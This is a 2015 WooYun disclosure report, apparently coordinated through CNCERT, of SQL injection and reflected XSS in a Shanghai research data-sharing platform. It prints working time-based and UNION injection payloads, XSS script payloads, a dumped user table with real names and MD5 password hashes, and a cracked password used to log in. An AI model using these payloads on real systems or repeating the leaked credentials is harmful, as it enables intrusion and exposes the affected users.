当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140553

漏洞标题:上海某数据共享平台sql注入与XSS打包

相关厂商:cncert国家互联网应急中心

漏洞作者: Aerfa21

提交时间:2015-09-15 11:22

修复时间:2015-11-01 15:34

公开时间:2015-11-01 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

RT

详细说明:

上海研发公共服务平台有效整合上海及长三角地区的科技资源,通过开放仪器设备与研究基地,共享科学数据和科技文献,提供专业技术、公益培训、专家咨询等服务,促进科技资...好久没交洞了,继续连载。
1 sql注入(无限制脱库),爆出用户密码和密码,不料认证通过后页面不存在

http://**.**.**.**/btin_cms/cnt/moreCount.do?
browseParam.channelName=%E4%BA%A7%E4%B8%9A%E5%8A%A8%E6%80%81&browseParam.channelName=%E4%BA%A7%E4%B8%9A%E6%94%BF%E7%AD%96%E6%B3%95%E8%A7
%84%E5%92%8C%E6%A0%87%E5%87%86&browseParam.templateName=BTIN_SUMMARY&browseParam.webSymbol=btin') AND (SELECT * FROM
(SELECT(SLEEP(5)))UrFp) AND ('TwOE'='TwOE


sql1.png


Database: btin
Table: tb_cms_user
[18 columns]
+-------------------+---------------+
| Column | Type |
+-------------------+---------------+
| address | varchar(500) |
| availability_date | date |
| check_articles | int(10) |
| created_date | datetime |
| creater | int(10) |
| description | varchar(4000) |
| last_edit_time | datetime |
| last_login_time | datetime |
| login_count | int(10) |
| name | varchar(50) |
| organization | varchar(500) |
| password | varchar(32) |
| phone | varchar(50) |
| role | varchar(20) |
| status | varchar(20) |
| submit_articles | int(10) |
| true_name | varchar(20) |
| user_id | int(10) |
+-------------------+---------------+
Database: btin
Table: tb_cms_user
[15 entries]
+-------------+--------------------------+----------------------------------+-----------+---------+
| login_count | name | password | true_name | user_id |
+-------------+--------------------------+----------------------------------+-----------+---------+
| 3 | chen_jing100@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 陈静 | 32 |
| 8 | dqlv@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | yhju | 33 |
| 626 | fhuang@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 黄菲 | 27 |
| 1 | hwu01@**.**.**.** | a8a3d0e05801ad8e60034365f5c3b6fd | 吴慧 | 19 |
| 2 | hywang1213@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 王慧媛 | 15 |
| 51 | jgren@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 任敬歌 | 23 |
| 160 | jiajia@**.**.**.** | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 贾佳 | 9 |
| 16 | jszhang@**.**.**.** | b10cbb6c51ac9ec77c8dc9f0bccdd296 | 张建设 | 28 |
| 33 | lbgao@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 高柳滨 | 26 |
| 232 | lifecenter@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | sdspb | 1 |
| 148 | liuxiao@**.**.**.** | 0f4237dd33c1e0d930180a402c5403d6 | 刘晓 | 14 |
| 63 | mhli@**.**.**.** | 34018b24aaa7b894f2dee606c9edaf5f | 李明辉 | 18 |
| 85 | mhruan@**.**.**.** | 4ddc1311251a0d11afa4696bec7829b3 | 阮梅花 | 13 |
| 4 | mrq@**.**.**.** | fed86d76f8faeb4ff6e022315aa8251c | 毛汝倩 | 21 |
| 5 | xuerusp@**.**.**.** | 96e79218965eb72c92a549dd5a330112 | 王冬冬 | 31 |
+-------------+--------------------------+----------------------------------+-----------+---------+


尝试登录,认证成功后页面不存在(什么情况?!)  chen_jing100@**.**.**.**:111111


sql2.png


2 XSS

http://**.**.**.**:80/trace/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/primer/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/hotdata/cn/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/taxonomy/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>
http://**.**.**.**:80/nucleotide/en/quickSearch.do?entrezWord="><script>alert(/xss/);</sCript>


xss.png


漏洞证明:

1 SQL注入(可爆62家企业敏感信息)

注入参数为industry :  
http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1&PageNo=2


http://**.**.**.**/web/changxing/changxing_fwlb.php?industry=%E6%96%B0%E8%83%BD%E6%BA%90&org_name=1' 
UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162716b71,0x61574876665276567442,0x716b787071)-- &PageNo=2


sql1.png


看看能不能得到很多敏感信息


sql2.png


sql3.png


2 XSS(非存储型)

http://**.**.**.**/web/changxing/changxing_fwlb.php?
industry=%25E4%25BF%25A1%25E6%2581%25AF%25E6%258A%2580%25E6%259C%25AF%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28/xss1/
%29%3C/ScRiPt%3E&org_name=%E4%B8%8A%E6%B5%B7%E8%B6%85%E7%BA%A7%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83


xss1.png


http://**.**.**.**/web/changxing/changxing_fwlb.php?
industry=%25E6%2596%25B0%25E8%2583%25BD%25E6%25BA%2590%27%22%28%29%26%25%3E%3CScRiPt%20%3Ealert%28/xss2/%29%3C/ScRiPt%3E
&org_name=%E4%B8%8A%E6%B5%B7%E5%A4%AA%E9%98%B3%E8%83%BD%E5%B7%A5%E7%A8%8B%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6%E4%B8%AD%E5%BF%83%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%EF%BC%88%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%AA%E9%98%B3%E8%83%BD%E5%85%89%E4%BC%8F%E6%8A%80%E6%9C%AF%E5%88%9B%E6%96%B0%E6%9C%8D%E5%8A%A1%E5%B9%B3%E5%8F%B0%EF%BC%89&PageNo=2


xss2.png


修复方案:

参数过滤

版权声明:转载请注明来源 Aerfa21@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-17 15:33

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。按多个风险评分,rank 12

最新状态:

暂无